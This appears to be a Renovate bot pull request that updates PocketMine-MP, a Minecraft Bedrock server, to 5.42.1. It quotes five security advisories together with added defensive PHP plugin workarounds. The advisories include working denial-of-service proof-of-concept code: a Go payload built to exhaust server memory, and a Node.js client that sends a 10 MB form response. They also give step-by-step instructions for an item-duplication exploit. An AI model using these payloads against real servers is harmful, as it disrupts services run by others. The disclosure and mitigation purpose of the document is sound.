
chore(deps): update dependency pocketmine/pocketmine-mp to v5.42.1 [security]#32

Open
renovate[bot] wants to merge 1 commit into master from renovate/packagist-pocketmine-pocketmine-mp-vulnerability

Conversation


@renovate renovate Bot commented Apr 7, 2026

This PR contains the following updates:

Package | Change
pocketmine/pocketmine-mp (source) | 5.37.1 -> 5.42.1

PocketMine-MP: LogDoS by large complex unknown property logging in clientData in LoginPacket

GHSA-h6rj-3m53-887h

More information

Details

Impact

Attackers can put large and/or complex structures as a value to an unknown property in the clientData JWT body in the Minecraft LoginPacket, causing the server to generate very long log messages.
Additionally, the property name is logged without any length limitations or sanitization, which can also be abused for LogDoS.

This may be used to spam the log/console, waste CPU time serializing the offending structure, and potentially to crash the server entirely.

This happens because the JsonMapper instance used to process the JWT body is configured to warn on unexpected properties instead of rejecting them outright. While this behaviour increases flexibility for random changes introduced by Microsoft, it also creates vulnerabilities if not handled carefully.

This vulnerability affects PocketMine-MP servers exposed to a public network where unknown actors may have access.

PoC
  1. Connect to the server using a custom client.

  2. Send a Minecraft LoginPacket containing an unexpected JSON property (e.g., invalid_key) within the ClientData.

  3. Set the value of invalid_key to a highly recursive or massive object structure (e.g., an array containing millions of elements or deeply nested arrays).

  4. The server hits the warnUndefinedJsonPropertyHandler, which attempts to var_export the malicious object, leading to an Out-of-Memory crash.

Go fragment from the custom client used in the PoC (the advisory does not show the surrounding client code; d is the client's ClientData struct). It builds a value that is 500 levels deep, 1000 elements wide at each level, with a 2,000,000-element slice as the leaf. On a vulnerable server this value reaches var_export in the undefined-property handler.

	A := make([]interface{}, 1)
	ptr := &A
	for i := 0; i < 500; i++ {
		next := make([]interface{}, 1000)
		(*ptr)[0] = next // nest the new level under the previous one
		ptr = &next
	}
	data := make([]int, 2000000)
	for i := 0; i < 100; i++ {
		data[i] = i
	}
	(*ptr)[0] = data // large leaf at the bottom of the chain
	d.PlayFabID = A  // sent as part of clientData in LoginPacket

Patches

The issue was addressed in pmmp/PocketMine-MP@87d1c0c by removing the relevant var_export and limiting the length of the logged property name to 80 characters.

Workarounds

Plugins can handle DataPacketReceiveEvent to capture LoginPacket, and pre-process the clientData JWT to ensure it doesn't have any unusual properties in it. This can be achieved using JsonMapper (see the original affected code below) and setting the bExceptionOnUndefinedProperty flag to true. A JsonMapper_Exception will be thrown if the JWT is problematic.

However, it's important to caveat that this approach may cause login failures if any unexpected properties appear out of the blue in future versions (which has happened in the past).

Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


PocketMine-MP: JSON decoding of unlimited size large arrays/objects in ModalFormResponse Handling

GHSA-788v-5pfp-93ff

More information

Details

Impact

The server does not meaningfully limit the size of the JSON payload in ModalFormResponsePacket. This can be abused by an attacker to waste memory and CPU on an affected server, e.g. by sending arrays with millions of elements.

The player must have a full session on the server (i.e. spawned in the world) to exploit this, as form responses are not handled unless the player is in game.

Patches

The issue was fixed in two parts:

  • cef1088341e40ee7a6fa079bca47a84f3524d877 limits the size of a single form response to 10 KB, which is well above expected size, but low enough to prevent abuse
  • f983f4f66d5e72d7a07109c8175799ab0ee771d5 avoids decoding the form response if there is no form associated with the given ID
Workarounds

This issue can be worked around in a plugin using DataPacketReceiveEvent by:

  • checking the max size of the formData field
  • making sure the form ID is not repeated

However, a full workaround for the issue would require reflection to access the Player->forms property, which is not exposed via any accessible API prior to 5.39.2.
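The partial workaround described above (size ceiling on formData, plus rejecting a form ID the same player has already answered), written here as an added example plugin; it is not PocketMine's code and not part of the advisory. It uses the same 10 KB ceiling as the fix. Assumptions: DataPacketReceiveEvent exposes the packet via getPacket() and the NetworkSession via getOrigin(), NetworkSession::getPlayer() is null until the player is in game, and ModalFormResponsePacket carries public formId and nullable formData fields. The 64-entry per-player memory of answered IDs is an arbitrary bound chosen for this example.

```php
<?php
declare(strict_types=1);

namespace example\formguard;

use pocketmine\event\Listener;
use pocketmine\event\player\PlayerQuitEvent;
use pocketmine\event\server\DataPacketReceiveEvent;
use pocketmine\network\mcpe\protocol\ModalFormResponsePacket;
use pocketmine\plugin\PluginBase;

final class Main extends PluginBase implements Listener{
	/** Same ceiling as the upstream fix: far above any real form response, far below a DoS payload. */
	private const MAX_FORM_DATA_BYTES = 10 * 1024;
	/** How many answered form IDs to remember per player (example value, not from the advisory). */
	private const REMEMBERED_IDS = 64;

	/** @var array<string, array<int, true>> player name => recently answered form IDs */
	private array $answered = [];

	protected function onEnable() : void{
		$this->getServer()->getPluginManager()->registerEvents($this, $this);
	}

	/**
	 * Returns true if this player has not answered this form ID before, and records it.
	 * PocketMine assigns form IDs incrementally per player, so a repeated ID can never
	 * belong to a pending form.
	 */
	public function recordFormId(string $playerName, int $formId) : bool{
		$ids = $this->answered[$playerName] ?? [];
		if(isset($ids[$formId])){
			return false;
		}
		$ids[$formId] = true;
		if(count($ids) > self::REMEMBERED_IDS){
			unset($ids[array_key_first($ids)]); //drop the oldest; array_shift would renumber the int keys
		}
		$this->answered[$playerName] = $ids;
		return true;
	}

	/**
	 * @priority LOWEST
	 */
	public function onDataPacketReceive(DataPacketReceiveEvent $event) : void{
		$packet = $event->getPacket();
		if(!$packet instanceof ModalFormResponsePacket){
			return;
		}
		$player = $event->getOrigin()->getPlayer();
		if($player === null){
			return; //not in game yet: the core ignores form responses at this stage anyway
		}

		//strlen() is a byte count and O(1); nothing here decodes the JSON
		$data = $packet->formData ?? "";
		if(strlen($data) > self::MAX_FORM_DATA_BYTES){
			$this->getLogger()->warning($player->getName() . " sent a " . strlen($data) . "-byte form response; dropped");
			$event->cancel();
			return;
		}

		if(!$this->recordFormId($player->getName(), $packet->formId)){
			$event->cancel(); //repeated ID: drop it before the core json_decodes the data
		}
	}

	public function onPlayerQuit(PlayerQuitEvent $event) : void{
		unset($this->answered[$event->getPlayer()->getName()]);
	}
}
```

As the advisory notes, this cannot tell that an ID was never issued (the PoC's formId 9999 passes the repeat check the first time); only the size ceiling stops that case, and a complete fix needs the Player->forms map, which the fixed versions consult themselves.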

PoC
  1. Join a PocketMine-MP server as a regular player (no special permissions needed).

  2. Use a modified client or packet-sending script to send a ModalFormResponsePacket with:

    • Any non-existent formId
    • formData containing a massive JSON array (e.g., 10+ MB payload).
  3. The server will attempt to parse the JSON and may freeze or become unresponsive.

Example Node.js pseudocode (bedrock-protocol client):

import { createClient } from 'bedrock-protocol';

const host = '127.0.0.1';
const port = 19132;
const username = 'Test';

// Offline-mode client: the target server must accept unauthenticated logins.
const client = createClient({
  host,
  port,
  username,
  offline: true
});

// ~10 MB JSON array of zeros; a vulnerable server json_decodes all of it.
const hugePayload = '[' + '0,'.repeat(5_000_000) + '0]';

client.on('error', (err) => console.error('[!] Client error:', err));
client.on('disconnect', (reason) => console.log('[*] Disconnected:', reason));

client.on('spawn', () => {
  console.log('[*] Connected & spawned. Sending malicious packet...');

  // Field names follow the advisory's pseudocode; check them against the
  // modal_form_response schema of the bedrock-protocol version in use.
  client.write('modal_form_response', {
    formId: 9999,         // nonexistent form ID
    formData: hugePayload // huge JSON
  });

  console.log('[*] Packet sent. The server should start freezing shortly.');
});

Severity

  • CVSS Score: 7.1 / 10 (High)
  • Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


PocketMine-MP: Network amplification vulnerability with ActorEventPacket

GHSA-7hmv-4j2j-pp6f

More information

Details

Impact

The server handles ActorEventPacket to trigger consuming animations from vanilla clients when they eat food or drink potions.

This can be abused to make the server spam other clients, and to waste server CPU and memory. For every ActorEventPacket sent by the client, an animation event will be sent to every other player the attacker is visible to.

This is similar to various other vulnerabilities which were fixed in the network overhaul of PM4 (e.g. AnimatePacket and LevelSoundEventPacket), but somehow this one slipped through the net.

Patches

The problem was addressed in aeea1150a772a005b92bd418366f1b7cf1a91ab5 by changing the mechanism for consuming animations to be fully controlled by the server. ActorEventPacket from the client is now discarded.

Workarounds

A plugin could use DataPacketDecodeEvent to rate-limit ActorEventPacket to prevent the attack.
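The rate limit suggested above, written here as an added example plugin (not PocketMine's code, not from the advisory). It hooks DataPacketDecodeEvent so the decision is made on the packet ID alone, before any decoding, and drops ActorEventPacket once a client exhausts a small token bucket; a dropped packet is never rebroadcast, which is the amplification the advisory describes. Assumptions: DataPacketDecodeEvent exposes getPacketId() and getOrigin(), cancelling it discards the packet, and ActorEventPacket::NETWORK_ID holds the numeric packet ID. The bucket parameters (burst of 5, refill 1/s) are example values chosen to stay well above the rate at which a vanilla client eats or drinks.

```php
<?php
declare(strict_types=1);

namespace example\actoreventlimit;

use pocketmine\event\Listener;
use pocketmine\event\player\PlayerQuitEvent;
use pocketmine\event\server\DataPacketDecodeEvent;
use pocketmine\network\mcpe\protocol\ActorEventPacket;
use pocketmine\plugin\PluginBase;

final class Main extends PluginBase implements Listener{
	/** Token bucket: a client may burst BURST packets, then sustain REFILL_PER_SECOND (example values). */
	private const BURST = 5;
	private const REFILL_PER_SECOND = 1.0;

	/** @var array<int, array{float, float}> session object id => [tokens, time of last refill] */
	private array $buckets = [];

	protected function onEnable() : void{
		$this->getServer()->getPluginManager()->registerEvents($this, $this);
	}

	/**
	 * Returns true if a packet from this session is within budget, false if it should be dropped.
	 * Tokens refill continuously; one is spent per accepted packet.
	 */
	public function allow(int $key, float $now) : bool{
		[$tokens, $last] = $this->buckets[$key] ?? [(float) self::BURST, $now];
		$tokens = min((float) self::BURST, $tokens + ($now - $last) * self::REFILL_PER_SECOND);
		if($tokens < 1.0){
			$this->buckets[$key] = [$tokens, $now];
			return false;
		}
		$this->buckets[$key] = [$tokens - 1.0, $now];
		return true;
	}

	public function onDataPacketDecode(DataPacketDecodeEvent $event) : void{
		//cheap integer compare on the packet ID; runs before any decoding work
		if($event->getPacketId() !== ActorEventPacket::NETWORK_ID){
			return;
		}
		$session = $event->getOrigin();
		if(!$this->allow(spl_object_id($session), microtime(true))){
			$event->cancel(); //dropped here, so nothing is broadcast to other players
		}
	}

	public function onPlayerQuit(PlayerQuitEvent $event) : void{
		unset($this->buckets[spl_object_id($event->getPlayer()->getNetworkSession())]);
	}
}
```

Keying on spl_object_id() is enough because entries are removed when the player quits; a session that never spawns leaves at most one stale entry, which a later session may harmlessly reuse. On fixed versions the packet is discarded by the core, so the limiter becomes a no-op.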

Severity

  • CVSS Score: 4.3 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


PocketMine-MP: Player entities can still die and drop items in flaggedForDespawn state

GHSA-f9jp-856v-8642

More information

Details

Summary

When an entity dies, the entity is flagged for despawn, but remains in the World's entity table, meaning it's still accessible by doing World->getEntity($entityId) and other methods. The same is true of a player when quitting the server.

When a network packet arrives from a client to attack an entity, the handler fetches the entity using World->getEntity($entityId) without any checks if the entity is already marked for despawning. Depending on the timing, the entity in question might already be in the flagged-for-despawn state when the action is processed. This means that the death handler for the entity might be run multiple times, causing loot and XP to be dropped multiple times, among other potential side effects.

Reproducing steps

To reproduce this vulnerability, two clients (Player A and Player B) are required.

Prerequisites:
- Player A (Victim): Must have the valuable items to be duplicated in their inventory and 1 HP (to ensure instant death).
- Player B (Attacker): Must be equipped with a weapon capable of dealing at least 1 damage.

Steps:
1. Player A and Player B stand next to each other.
2. Player A initiates the disconnect sequence (e.g., clicking "Disconnect" or "Exit to Menu").
3. Immediately after Player A triggers the disconnect (within a split-second window), Player B must attack and kill Player A.
4. Player A's character dies server-side, and their inventory drops on the ground.
5. Player B collects the dropped items.
6. Player A logs back into the server.
7. Result: Player A still possesses the original items in their inventory, while Player B holds the dropped copies.

Patches

The issue was fixed in pmmp/PocketMine-MP@c0719b7 by adding checks for flagged-for-despawn entities in several affected locations.

While a cleaner fix would be to have World's various entity accessing methods exclude flagged-for-despawn entities, this was deemed too risky for 5.x as it would require significant internal changes.

Workarounds

Plugins can mitigate this issue on older versions by handling EntityDamageByEntityEvent, checking if the victim entity is flagged for despawn, and if so, cancelling the event.

Severity

  • CVSS Score: 3.7 / 10 (Low)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


PocketMine-MP has LogDoS by many junk properties in client data JWT in LoginPacket

GHSA-xp4f-g2cm-rhg7

More information

Details

Impact

Attackers can fill the body of the clientData JWT in LoginPacket with lots of junk properties, causing the server to flood warning messages, as well as wasting CPU time.

This happens because the JsonMapper instance used to process the JWT body is configured to warn on unexpected properties instead of rejecting them outright. While this behaviour increases flexibility for random changes introduced by Microsoft, it also creates vulnerabilities if not handled carefully.

This vulnerability affects PocketMine-MP servers exposed to a public network where unknown actors may have access.

Patches

This issue was fixed in c1d4a813fb8c21bfd8b9affd040da864b794df71 by restricting the number of unknown properties to 10, and rejecting the packet if this limit is exceeded. This continues to tolerate random additions to the JWT between versions, while preventing the logger from being abused by clients to slow down the server.

Workarounds

Plugins can handle DataPacketReceiveEvent to capture LoginPacket, and pre-process the clientData JWT to ensure it doesn't have any unusual properties in it. This can be achieved using JsonMapper (see the original affected code below) and setting the bExceptionOnUndefinedProperty flag to true. A JsonMapper_Exception will be thrown if the JWT is problematic.

However, it's important to caveat that this approach may cause login failures if any unexpected properties appear out of the blue in future versions (which has happened in the past).
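The two LoginPacket advisories above (GHSA-h6rj-3m53-887h, large or complex values on an unknown property, and GHSA-xp4f-g2cm-rhg7, many junk properties) share one workaround path, so one added example plugin serves both; it is not PocketMine's code and not part of either advisory. Instead of the all-or-nothing bExceptionOnUndefinedProperty switch, it keeps JsonMapper in tolerant mode and installs an undefinedPropertyHandler that applies the fixes' own limits: at most 10 unknown properties, names logged at no more than 80 printable characters, and the unknown value never serialized. To also cover the complex-value vector on unpatched servers, the handler rejects an unknown property whose value is not a scalar or is an oversized string, an O(1) check that still tolerates the small scalar fields Microsoft tends to add between versions; that policy and the 1024-byte string limit are this example's choices, not the project's. Assumptions: LoginPacket exposes the JWT as the public clientDataJwt property, JwtUtils::parse() returns [headers, claims, signature] with claims as an array, ClientData lives at pocketmine\network\mcpe\protocol\types\login\ClientData, NetworkSession::disconnect() accepts a string reason, and netresearch/jsonmapper calls the handler as (object, string, mixed). Signature verification and full field validation stay with the core handler, which parses the JWT again after this event.

```php
<?php
declare(strict_types=1);

namespace example\loginguard;

use pocketmine\event\Listener;
use pocketmine\event\server\DataPacketReceiveEvent;
use pocketmine\network\mcpe\JwtException;
use pocketmine\network\mcpe\JwtUtils;
use pocketmine\network\mcpe\protocol\LoginPacket;
use pocketmine\network\mcpe\protocol\types\login\ClientData;
use pocketmine\plugin\PluginBase;

/** Thrown from the JsonMapper handler to stop mapping as soon as a limit is hit. */
final class RejectedClientDataException extends \RuntimeException{}

final class Main extends PluginBase implements Listener{
	/** Limits taken from the upstream fixes. */
	private const MAX_UNKNOWN_PROPERTIES = 10;
	private const MAX_LOGGED_NAME_LENGTH = 80;
	/** Example policy (not from the advisories): unknown scalars longer than this are rejected. */
	private const MAX_UNKNOWN_SCALAR_BYTES = 1024;

	protected function onEnable() : void{
		$this->getServer()->getPluginManager()->registerEvents($this, $this);
	}

	/**
	 * Render a client-supplied property name safely for the log: bounded length and
	 * printable ASCII only, so it cannot inject newlines or megabytes into the console.
	 */
	public static function safeName(string $name) : string{
		$truncated = strlen($name) > self::MAX_LOGGED_NAME_LENGTH;
		$name = substr($name, 0, self::MAX_LOGGED_NAME_LENGTH);
		$name = preg_replace('/[^\x20-\x7E]/', '?', $name) ?? '';
		return $truncated ? $name . "..." : $name;
	}

	/**
	 * Map the decoded JWT body onto ClientData and return the unknown property names,
	 * or throw RejectedClientDataException. Unknown values are only inspected with
	 * O(1) type and length checks; they are never serialized or walked.
	 *
	 * @param mixed[] $claims
	 * @return string[]
	 */
	public static function collectUnknownProperties(array $claims) : array{
		$unknown = [];
		$mapper = new \JsonMapper();
		$mapper->bEnforceMapType = false; //the claims are an array, as in the core handler
		$mapper->bExceptionOnMissingData = false; //missing-field validation stays with the core
		$mapper->bExceptionOnUndefinedProperty = false; //strict mode would break on future additions
		$mapper->undefinedPropertyHandler = static function(object $object, string $propName, mixed $value) use (&$unknown) : void{
			$unknown[] = $propName;
			if(count($unknown) > self::MAX_UNKNOWN_PROPERTIES){
				throw new RejectedClientDataException("more than " . self::MAX_UNKNOWN_PROPERTIES . " unknown properties");
			}
			if(!is_scalar($value) && $value !== null){
				throw new RejectedClientDataException("non-scalar value for unknown property \"" . self::safeName($propName) . "\"");
			}
			if(is_string($value) && strlen($value) > self::MAX_UNKNOWN_SCALAR_BYTES){
				throw new RejectedClientDataException("oversized value for unknown property \"" . self::safeName($propName) . "\"");
			}
		};
		$mapper->map($claims, new ClientData());
		return $unknown;
	}

	/**
	 * @priority LOWEST
	 */
	public function onDataPacketReceive(DataPacketReceiveEvent $event) : void{
		$packet = $event->getPacket();
		if(!$packet instanceof LoginPacket){
			return;
		}
		$session = $event->getOrigin();
		try{
			[, $claims, ] = JwtUtils::parse($packet->clientDataJwt);
			$unknown = self::collectUnknownProperties($claims);
		}catch(RejectedClientDataException $e){
			$this->getLogger()->warning("Rejected login from " . $session->getIp() . ": " . $e->getMessage());
			$event->cancel();
			$session->disconnect("Invalid client data");
			return;
		}catch(JwtException | \JsonMapper_Exception $e){
			return; //malformed JWT or type error: the core handler rejects it with its own message
		}
		foreach($unknown as $name){
			$this->getLogger()->debug("Unknown clientData property \"" . self::safeName($name) . "\" from " . $session->getIp());
		}
	}
}
```

The non-scalar rule carries the same trade-off the advisories mention: if a future client version adds a legitimate array-valued field before the server's ClientData model learns about it, logins fail until the model is updated. Operators who prefer the tolerant behaviour can drop that branch and rely on the 10-property limit alone, which is what the fixed versions do once var_export is gone.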

References

Affected code:

https://github.com/pmmp/PocketMine-MP/blob/5.41.1/src/network/mcpe/handler/LoginPacketHandler.php#L289-L303
https://github.com/pmmp/PocketMine-MP/blob/5.41.1/src/network/mcpe/handler/LoginPacketHandler.php#L334-L350

Severity

  • CVSS Score: 6.9 / 10 (Medium)
  • Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


Release Notes

pmmp/PocketMine-MP (pocketmine/pocketmine-mp)

v5.42.1: PocketMine-MP 5.42.1

Compare Source

For Minecraft: Bedrock Edition 1.26.10 (display version v26.10)

This is a security and bugfix release. Updating is strongly recommended.

Please see the changelogs for details.

ℹ️ Download the recommended PHP binary here.

⚠️ Found a bug? Report it on our issue tracker. We can't fix bugs if you don't report them.

v5.42.0: PocketMine-MP 5.42.0

Compare Source

For Minecraft: Bedrock Edition 1.26.10 (display version v26.10)

This is a support release for Minecraft: Bedrock Edition 1.26.10 (display version v26.10).

Please see the changelogs for details.

If you're upgrading from 5.40.x directly to 5.42.0, please also read the following changelogs, as the interim releases contain important changes:

  • 5.41.0 - new gameplay and API features, performance improvements and network security improvements

ℹ️ Download the recommended PHP binary here.

⚠️ Found a bug? Report it on our issue tracker. We can't fix bugs if you don't report them.

v5.41.1: PocketMine-MP 5.41.1

Compare Source

For Minecraft: Bedrock Edition 1.26.0 (display version v26.0)

This is a security release. Upgrading is strongly recommended.

Please see the changelogs for details.

ℹ️ Download the recommended PHP binary here.

⚠️ Found a bug? Report it on our issue tracker. We can't fix bugs if you don't report them.

v5.41.0: PocketMine-MP 5.41.0

Compare Source

For Minecraft: Bedrock Edition 1.26.0 (display version v26.0)

This is a minor feature release, including new gameplay and API features, performance improvements and network security improvements.

Please see the changelogs for details.

ℹ️ Download the recommended PHP binary here.

⚠️ Found a bug? Report it on our issue tracker. We can't fix bugs if you don't report them.

v5.40.0: PocketMine-MP 5.40.0

Compare Source

For Minecraft: Bedrock Edition 1.26.0 (display version v26.0)

This is a support release for Minecraft: Bedrock Edition 1.26.0 (display version v26.0).

Please see the changelogs for details.

ℹ️ Download the recommended PHP binary here.

⚠️ Found a bug? Report it on our issue tracker. We can't fix bugs if you don't report them.

v5.39.3: PocketMine-MP 5.39.3

Compare Source

For Minecraft: Bedrock Edition 1.21.130

This is a security and bugfix release.

Please see the changelogs for details.

ℹ️ Download the recommended PHP binary here.

⚠️ Found a bug? Report it on our issue tracker. We can't fix bugs if you don't report them.

v5.39.2: PocketMine-MP 5.39.2

Compare Source

For Minecraft: Bedrock Edition 1.21.130

This is a security and bugfix release.

Please see the changelogs for details.

ℹ️ Download the recommended PHP binary here.

⚠️ Found a bug? Report it on our issue tracker. We can't fix bugs if you don't report them.

v5.39.1: PocketMine-MP 5.39.1

Compare Source

For Minecraft: Bedrock Edition 1.21.130

This is a bugfix release.

Please see the changelogs for details.

ℹ️ Download the recommended PHP binary here.

⚠️ Found a bug? Report it on our issue tracker. We can't fix bugs if you don't report them.

v5.39.0: PocketMine-MP 5.39.0

Compare Source

For Minecraft: Bedrock Edition 1.21.130

This is a minor feature release, including major performance improvements to world generation, new gameplay features, new API additions and other improvements.

Please see the changelogs for details.

ℹ️ Download the recommended PHP binary here.

⚠️ Found a bug? Report it on our issue tracker. We can't fix bugs if you don't report them.

v5.38.0: PocketMine-MP 5.38.0

Compare Source

For Minecraft: Bedrock Edition 1.21.130

This is a support release for Minecraft: Bedrock Edition 1.21.130.

Please see the changelogs for details.

ℹ️ Download the recommended PHP binary here.

⚠️ Found a bug? Report it on our issue tracker. We can't fix bugs if you don't report them.

v5.37.3: PocketMine-MP 5.37.3

Compare Source

For Minecraft: Bedrock Edition 1.21.124

This release fixes the Docker image build.
Otherwise, it is identical to 5.37.2.

Please see the changelogs for details.

ℹ️ Download the recommended PHP binary here.

⚠️ Found a bug? Report it on our issue tracker. We can't fix bugs if you don't report them.

v5.37.2: PocketMine-MP 5.37.2

Compare Source

For Minecraft: Bedrock Edition 1.21.124

This is a bugfix and protocol support release.

While the headline version is .124, .120-.123 are still accepted since there are no protocol changes relevant to PM in these versions.

Please see the changelogs for details.

ℹ️ Download the recommended PHP binary here.

⚠️ Found a bug? Report it on our issue tracker. We can't fix bugs if you don't report them.


Configuration

📅 Schedule: (UTC)

  • Branch creation
    • ""
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Enabled.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate Bot added the dependencies label Apr 7, 2026
@renovate renovate Bot force-pushed the renovate/packagist-pocketmine-pocketmine-mp-vulnerability branch 2 times, most recently from 7e3c152 to b9ec626 Compare April 16, 2026 11:45
@renovate renovate Bot changed the title chore(deps): update dependency pocketmine/pocketmine-mp to v5.41.1 [security] chore(deps): update dependency pocketmine/pocketmine-mp to v5.42.1 [security] Apr 16, 2026
@renovate renovate Bot changed the title chore(deps): update dependency pocketmine/pocketmine-mp to v5.42.1 [security] chore(deps): update dependency pocketmine/pocketmine-mp to v5.42.1 [security] - autoclosed Apr 27, 2026
@renovate renovate Bot closed this Apr 27, 2026
@renovate renovate Bot deleted the renovate/packagist-pocketmine-pocketmine-mp-vulnerability branch April 27, 2026 19:13
@renovate renovate Bot changed the title chore(deps): update dependency pocketmine/pocketmine-mp to v5.42.1 [security] - autoclosed chore(deps): update dependency pocketmine/pocketmine-mp to v5.42.1 [security] Apr 27, 2026
@renovate renovate Bot reopened this Apr 27, 2026
@renovate renovate Bot force-pushed the renovate/packagist-pocketmine-pocketmine-mp-vulnerability branch 2 times, most recently from b9ec626 to 637d3e1 Compare April 27, 2026 23:29